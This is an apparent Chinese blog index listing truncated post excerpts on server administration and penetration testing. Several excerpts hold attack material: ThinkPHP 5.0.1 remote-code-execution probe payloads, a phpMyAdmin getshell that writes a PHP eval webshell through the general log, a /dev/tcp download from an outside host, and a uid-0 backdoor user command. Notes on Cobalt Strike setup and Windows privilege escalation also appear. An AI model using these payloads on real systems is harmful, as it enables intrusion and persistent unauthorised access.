thinkphp 5.0.1的坑

2021年04月18日  No comment

判断是否存在http://xxx.com/publics=phpinfo()&_method=__construct&filter=assert _method=__construct&method=get&filter[]=call_user_func&server[]=phpinfo&get[]=phpinfo _method=__construct&method=get&filter[]=call_user_func&
阅读全文 »

Linux服务器使用speedtest-cli测速

2020年11月30日  No comment

需要在python环境下使用pip install speedtest-clispeedtest-clispeedtest-cli --list | grep Chinaspeedtest-cli --server 4870
阅读全文 »

Linux同步时间

2020年11月29日  No comment

 由于NTP服务同步时间存在秒的误差采用 tzselect 来精准设置cp /usr/share/zoneinfo/Asia/Shanghai /etc/localtimeordate -s 20/11/29 date -s 23:35:09
阅读全文 »

Nginx反向代理镜像网站

2020年11月14日  No comment

  链接:https://pan.baidu.com/s/1NmFd4EAgpR6D0xj3vcKE3g 密码:a834 tar -zxvf nginx-1.7.5.tar.gz  tar -zxvf pcre-8.37.tar.gz   tar -zxvf openssl-1.0.2a.tar.gz   tar -zxvf&nbs
阅读全文 »

获取阿里云机器的外网IP

2020年11月14日  No comment

        用于获取 ipconfig 不显示外网IP的机器nslookup myip.opendns.com. resolver1.opendns.com      wget http://members.3322.org/dyndns/getip  curl ip.sb curl ip.cn
阅读全文 »

php实现微信qq防封

2020年05月05日  No comment

<?php function is_weixin_visit() {     if (strpos($_SERVER['HTTP_USER_AGENT'], 'MicroMessenger') !== false) {         return true;
阅读全文 »

安装cobalt strike踩坑记录

2019年11月07日  No comment

安装cobalt strike踩坑记录yum -y installed|grep java                 //检查已安装java版本 yum -y remove java*    //卸载已安装的java&nbs
阅读全文 »

phpmyadmin getshell 记录

2019年09月08日  No comment

    phpmyadmin getshellselect '<?php @eval($_POST[admin])?>'; show global variables like '%general%'; set global general_log = on; set global gen
阅读全文 »

Windows提权辅助工具Windows-Exploit-Suggester

2019年08月14日  No comment

安装               python 3.3.3安装xlrd库 https://pypi.org/project/xlrd/https://www.python.org/ftp/python/3.3.3/python-3.3.3.amd64.msihttps://www.python.org/ftp/python/3.3.3/python-3.3.
阅读全文 »

linux常用渗透小技巧

2019年08月09日  No comment

无wget nc等下载工具时下载文件exec 5<>/dev/tcp/yese.yi.org/80 &&echo -e “GET /c.pl HTTP/1.0\n” >&5 && cat<&5 > c.pl2.Linux添加uid为0的用户useradd -o -u 0 
阅读全文 »